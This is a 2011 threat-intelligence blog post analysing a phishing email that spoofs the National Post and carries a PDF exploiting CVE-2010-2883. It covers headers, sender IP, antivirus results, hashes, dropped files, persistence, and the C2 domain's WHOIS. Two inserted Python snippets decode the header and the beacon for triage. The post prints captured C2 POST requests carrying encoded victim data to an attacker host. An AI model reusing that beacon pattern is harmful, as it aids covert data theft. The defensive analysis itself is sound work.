Tuesday, May 31, 2011

May 17 CVE-2010-2883 PDF Bin Laden's successor from spoofed Nationalpost.com

SIZE 103981 bytes
EXPLOIT TYPE         CVE-2010-2883
FILE NAME             Bin Ladens successor.pdf

Post Updates

The file uses the Fonts/SING CVE-2010-2883 exploit, which does not seem to be Metasploit-generated.

The sender often uses compromised servers of different organizations:
    *     Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce

    *     Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account

     It is unclear whether this time it is a compromised server or whether the attacker uses this internet provider's services as a customer.

    Beyond the Network America, Inc. (BTNaccess) is a wholly owned subsidiary of PCCW, and is headquartered in Reston, Virginia and Hong Kong with offices in Los Angeles, New York City, Philadelphia, Houston, London, Moscow, Prague, Kuala Lumpur, Singapore, Shenzhen, Tokyo, Mumbai and New Delhi.

    PCCW, a global leader in next generation broadband solutions, is the largest telecommunications provider in Hong Kong. PCCW is the operator of one of the world’s most advanced broadband networks and has over 700,000 broadband customers and 12,500 employees worldwide. As a global player, PCCW has portrayed innovation within the industry and demonstrated financial stability with 2003 revenues reaching US$2.89 billion.


    Original Message

    -----Original Message-----
    From: Peter Goodspeed [mailto:gpeter@nationalpost.com]
    Sent: Monday, May 16, 2011 10:02 PM
    To: xxxxxxxxxxx
    Subject: Bin Laden’s successor may launch new strike


    Wellcome to Subscribe our Journals.Please find attached the analysis

    of "Bin Laden¡¯s successor may launch new strike".

    Best regards,

    National Post
    Peter Goodspeed
    1450 Don Mills Road, Suite 300
    Don Mills, Ontario
    M3B 3R5

    Message Headers

    Received: (qmail 10512 invoked from network); 17 May 2011 02:00:58 -0000
    Received: from unknown (HELO nationalpost.com) (
      by xxxxxxxxxx with SMTP; 17 May 2011 02:00:58 -0000
    From: "Peter Goodspeed"
    Subject: Bin =?GB2312?B?TGFkZW6hr3M=?= successor may launch new strike
    To: xxxxxxxxxxxxxxxx
    Content-Type: multipart/mixed;
        boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; charset="GB2312"
    MIME-Version: 1.0
    Reply-To: gpeter@nationalpost.com
    Date: Tue, 17 May 2011 10:01:40 +0800
    X-Priority: 3
    X-Mailer: FoxMail 3.11 Release [cn]
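As an added example (not part of the original post), the following Python decodes the RFC 2047 encoded-word in the Subject header above and shows that the sending client declared GB2312, a Chinese charset, for a message purporting to come from a Canadian newspaper; decoding the same bytes as Latin-1 reproduces the "Bin Laden¡¯s" seen in the quoted message body. The list of charsets in `charset_mismatch` is my own triage assumption, not something the post states.

```python
import base64
import re
from email.header import decode_header

# Subject line copied from the message headers quoted in the post.
SUBJECT = "Bin =?GB2312?B?TGFkZW6hr3M=?= successor may launch new strike"

# RFC 2047 encoded-word: =?charset?encoding?encoded-text?=
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([BbQq])\?([^?]*)\?=")


def encoded_word_charsets(header):
    """Charsets declared by the encoded-words in a header, lower-cased."""
    return [m.group(1).lower() for m in ENCODED_WORD.finditer(header)]


def decode_subject(header):
    """Decode the header using the charset each encoded-word declares."""
    out = []
    for chunk, charset in decode_header(header):
        if isinstance(chunk, bytes):
            out.append(chunk.decode(charset or "ascii"))
        else:
            out.append(chunk)
    return "".join(out)


def latin1_view(header):
    """Decode the first (B-encoded) encoded-word as Latin-1 instead of the
    declared charset: the mojibake a Western mail client would display."""
    match = ENCODED_WORD.search(header)
    raw = base64.b64decode(match.group(3))
    return raw.decode("latin-1")


def charset_mismatch(header, expected=("us-ascii", "iso-8859-1", "utf-8")):
    """Triage heuristic (assumption): flag encoded-words whose charset is
    outside the set the claimed sender's locale would normally produce."""
    return any(cs not in expected for cs in encoded_word_charsets(header))


if __name__ == "__main__":
    print(decode_subject(SUBJECT))
    print(encoded_word_charsets(SUBJECT))
    print(latin1_view(SUBJECT))
    print(charset_mismatch(SUBJECT))
```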

    Sender IP

    Beyond the Network America in Hong Kong
    Host reachable, 252 ms. average -

    Beyond The Network America, Inc.
    450 Springpark PL
    Suite 100
    United States

    Downes, Chris

    PCCW AUP Department
    ISP:    Beyond The Network America
    Organization:    Beyond The Network America
    Proxy:    None detected
    Type:    Corporate
    Assignment:    Static IP
    Geolocation Information
    Country:    Hong Kong 
    City:    Hong Kong   

    Nationalpost.com was spoofed; the domain's real hosting location is in Canada:
    Postmedia Network Inc.
    Peter deGroot
    1450 Don Mills Rd.
    Toronto, ON M3B 2X7
    Phone: 1 905 3042195 ()
    Fax..: 1 905 3042195
    Email: Webnames@postmedia.com

    Automated Scans

    File name: Bin Laden

    Submission date: 2011-05-31 11:28:53 (UTC)
    Result: 16/42 (38.1%)
    AntiVir 2011.05.31 EXP/CVE-2010-2883.F
    Antiy-AVL 2011.05.31 Exploit/Win32.Pidief
    Avast 4.8.1351.0 2011.05.31 JS:Pdfka-gen
    Avast5 5.0.677.0 2011.05.31 JS:Pdfka-gen
    ClamAV 2011.05.31 PUA.Script.PDF.EmbeddedJS
    Commtouch 2011.05.31 PDF/Obfusc.J!Camelot
    Comodo 8902 2011.05.31 UnclassifiedMalware
    DrWeb 2011.05.31 Exploit.PDF.2197
    eTrust-Vet 36.1.8358 2011.05.31 PDF/Pidief!generic
    F-Prot 2011.05.30 JS/ShellCode.DF.gen
    Fortinet 2011.05.31 PDF/CoolType!exploit.CVE20102883
    GData 22 2011.05.31 JS:Pdfka-gen 
    Ikarus T3. 2011.05.31 Exploit.PDF
    Microsoft 1.6903 2011.05.31 Exploit:Win32/CVE-2010-2883.A
    Sophos 4.65.0 2011.05.31 Mal/PDFJs-Z

    MD5   : 8e633588b3ee59de09fe126d99869d2d

    Created files and traffic

     the payload is the same type of trojan described 

    Created files
    C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll     MD5:   5D4877E3603149372CA210A8D2B60492
    C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe     MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
    C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe             MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
    C:\Documents and Settings\All Users\Application Data\desktop.BIN             MD5:  4353E469D8B4A7BAE876C81D3CAAA0D1
     The traffic is also analyzed in the mentioned post
    # Persistence is achieved by relaunching the binary from the infected user's Startup folder (Start Menu\Programs\Startup\userinit.exe); a copy of the file is also created as All Users\Application Data\desktop.BIN
    # Userinit.exe creates a folder named Logs in %userprofile%\Local Settings\Application Data\Windows\Logs. A shortcut like the one in the image below shows up in that directory for a split second, but I did not capture it. This is the file that gets transmitted with HTTP POST; MDAwMGhIRUwuMDk in the meta part of the URL string decodes as meta=0000hHEL.09

        POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1

    The last part, lfdxfircvscxggb, changes with each GET request and is possibly an encoded directory name on the victim PC.
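As an added example (not part of the original post), this Python parses the captured request line above, undoes the extra percent-encoding, and base64-decodes every query parameter, generalising the manual decoding of the meta field to all four fields. The request line is copied from the post with the zero-width characters removed; the UTF-16LE detection is my own heuristic.

```python
import base64
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line copied from the post's capture (zero-width characters removed).
# The query string is percent-encoded a second time (%3F, %3D, %26).
REQUEST_LINE = (
    "POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA"
    "%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1"
)


def decode_param(value):
    """Base64-decode one parameter; return text, or None if it is not base64.
    Heuristic (my assumption, not from the post): a decoded buffer whose odd
    bytes are all NUL is treated as UTF-16LE, otherwise as ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None


def parse_beacon(request_line):
    """Split the request line and decode every query parameter it carries."""
    method, target, _version = request_line.split(" ", 2)
    target = unquote(target)                 # %3F -> ?, %3D -> =, %26 -> &
    parts = urlsplit(target)
    fields = {}
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = decode_param(value)
        fields[key] = value if decoded is None else decoded
    return method, parts.path, fields


if __name__ == "__main__":
    method, path, fields = parse_beacon(REQUEST_LINE)
    print(method, path)
    for key, value in fields.items():
        print(f"  {key} = {value!r}")
```

Run against the captured line, hl and q decode as UTF-16LE (HANS and the private address 192.168.2.2), meta as the ASCII 0000hHEL.09 already noted above, and id is not valid base64, so it is passed through unchanged.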

    C2 information 
    DNS queries and traffic to

    www.offlinewebpage.com    HTTP    POST /qduxwfnfozvsrtkjprepggxrpnrvyst.htm HTTP/1.1 
    Reverse IP Lookup Results—3 domains hosted on IP address

       Updated Date: 2010-10-05
       Creation Date: 2010-10-05
       Expiration Date: 2012-10-05
        david Boulevard
        No.17 Ren Rd. zonn District, fifa, akai 116001
            bb aa 116001
            Phone: +86.075184562547 Fax: +86.075184562547
    Administrative Contact:
        david Boulevard new delphi qingwa20112011@163.com
        No.17 Ren Rd. zonn District, fifa, akai 116001

    Registrar of Record: NAME2HOST, INC.
    Domain servers in listed order:

    IP Address History
    Event Date     Action     Pre-Action IP     Post-Action IP
    2010-10-06     New     -none-
    2011-03-18     Change
    2011-04-10     New     -none-

    Traffic to 
    inetnum: -
    ISP:    China Unicom Beijing Province Network
    Organization:    China Unicom Beijing Province Network
    Proxy:    None detected
    Type:    Broadband
    Assignment:    Static IP
    Country:    China
    State/Region:    Beijing
    City:    Beijing
